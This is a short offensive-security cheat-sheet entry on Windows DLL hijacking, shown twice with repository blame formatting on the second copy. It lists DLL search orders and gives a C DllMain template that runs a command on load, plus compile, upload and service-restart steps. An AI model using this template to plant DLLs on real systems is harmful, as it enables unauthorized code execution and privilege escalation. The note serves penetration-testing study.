killchain-compendium/Exploits/Windows/DLL Hijacking.md

# DLL Hijacking

## Search Orders
* __SafeDllSearchMode__ enabled searches paths in following order: 
    * __cwd__ of executable
    * System directory, `GetSystemDirectory`
    * 16-bit system directory 
    * Windows, `GetWindowsDirectory`
    * __pwd__
    * PATH

* __SafeDllSearchMode__ disabled searches in following order:
    * __cwd__ of executable
    * __pwd__ 
    * System directory
    * 16-bit system directory
    * Windows directory 
    * PATH environment variable

## Template
```C
#include <windows.h>

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
        ExitProcess(0);
    }
    return TRUE;
}
```
* Compilation via
```sh
x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
```
* Upload to target
* Restart dllsvervice via
```sh
sc stop dllsvc
sc start dllsvc
```
restructured Exploits 2022-11-13 22:38:01 +01:00			`# DLL Hijacking`

			`## Search Orders`
			`* __SafeDllSearchMode__ enabled searches paths in following order:`
			`* __cwd__ of executable`
			* System directory, `GetSystemDirectory`
			`* 16-bit system directory`
			* Windows, `GetWindowsDirectory`
			`* __pwd__`
			`* PATH`

			`* __SafeDllSearchMode__ disabled searches in following order:`
			`* __cwd__ of executable`
			`* __pwd__`
			`* System directory`
			`* 16-bit system directory`
			`* Windows directory`
			`* PATH environment variable`

			`## Template`
			```C
			`#include <windows.h>`

			`BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {`
			`if (dwReason == DLL_PROCESS_ATTACH) {`
			`system("cmd.exe /k whoami > C:\\Temp\\dll.txt");`
			`ExitProcess(0);`
			`}`
			`return TRUE;`
			`}`
			```
			`* Compilation via`
			```sh
			`x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll`
			```
			`* Upload to target`
			`* Restart dllsvervice via`
			```sh
			`sc stop dllsvc`
			`sc start dllsvc`
			```